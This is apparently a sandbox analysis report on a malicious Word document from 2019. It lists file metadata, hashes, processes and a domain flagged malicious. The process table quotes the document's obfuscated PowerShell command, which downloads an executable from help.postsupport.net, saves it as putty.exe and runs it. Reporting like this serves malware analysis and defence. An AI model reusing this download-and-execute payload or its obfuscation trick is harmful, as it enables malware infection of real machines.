Field | Value
---|---
File name: | 6f3badceca5e4efea401c34134544d73f19a79f7ffb1401c66e795e5181624ec
Full analysis: | https://app.any.run/tasks/bbe06f80-cb02-447e-8ab7-c827ebc520f7
Verdict: | Malicious activity
Analysis date: | July 18, 2019, 06:27:34
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: | —
Indicators: | —
MIME: | application/msword
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: , Author: dood, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed Jan 16 10:16:00 2019, Last Saved Time/Date: Wed Jan 16 10:16:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5: | D7F30FA3CCF4F3CE1C7D89564C0EDF5F
SHA1: | 43A1E499C7D1F6E1A0D723E179D51E8AF83994EA
SHA256: | 6F3BADCECA5E4EFEA401C34134544D73F19A79F7FFB1401C66E795E5181624EC
SSDEEP: | 3072:8TTwHo66OblnBQMFCESpcSO6iNAATCdOSrv5:LHXRblnBvFCESpcSz
Extension | Identification (score)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
Title: | —
Subject: | - |
Author: | dood |
Keywords: | - |
Template: | Normal.dotm |
LastModifiedBy: | Admin |
RevisionNumber: | 2 |
Software: | Microsoft Office Word |
TotalEditTime: | 1.0 minutes |
CreateDate: | 2019:01:16 10:16:00 |
ModifyDate: | 2019:01:16 10:16:00 |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | home |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 1 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | —
HeadingPairs: | —
CompObjUserTypeLen: | 32 |
CompObjUserType: | ???????? Microsoft Word 97-2003 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3528 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\6f3badceca5e4efea401c34134544d73f19a79f7ffb1401c66e795e5181624ec.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1692 | powershell $bHzZ8j = '$bILM07V = 30936.458089142new30936.458089142-obj30936.458089142ect net30936.458089142.web30936.458089142cli30936.458089142ent; $bILM07V.dow30936.458089142nlo30936.458089142a30936.458089142dfi30936.458089142le(\"h30936.458089142t30936.458089142t30936.458089142p://help.postsupport.net/qwydbbcdu.png?bg=sp20\", \"c:\win30936.458089142dows\t30936.458089142emp\put30936.458089142ty.ex30936.458089142e\"); 30936.458089142s30936.458089142tar30936.458089142t-p30936.458089142ro30936.458089142ces30936.458089142s \"c:\windo30936.458089142ws\temp\p30936.458089142utt30936.458089142y.ex30936.458089142e\";'.replace('30936.458089142', $MNA1S2zrx);iex($bHzZ8j); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type
---|---|---|---
3528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD07F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DNX0RX326AQHGN8DJMFB.temp | — | |
MD5:— | SHA256:— | |||
1692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
1692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17d987.TMP | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
3528 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A007ECCE225F5CE4BE0F2923681B83B3 | SHA256:4A18D40A7B4AC9CA7709652BBBAAB9D1B2A70FE3D6A247024553CDD4B08D73CB | |||
3528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:484888728EC96FD20CAF9600CA8B39A8 | SHA256:494D488C5E8FCDC84B18357AD4075A21C6958D147ED5D90B0491364443B48FD4 | |||
3528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$3badceca5e4efea401c34134544d73f19a79f7ffb1401c66e795e5181624ec.doc | pgc | |
MD5:478A2038B1582D7102C6F916BCBCEB87 | SHA256:38B8648B2E880C980C6783F155203C7A7E210099F9370C49016C690D37506257 | |||
Domain | IP | Reputation
---|---|---
help.postsupport.net | — | malicious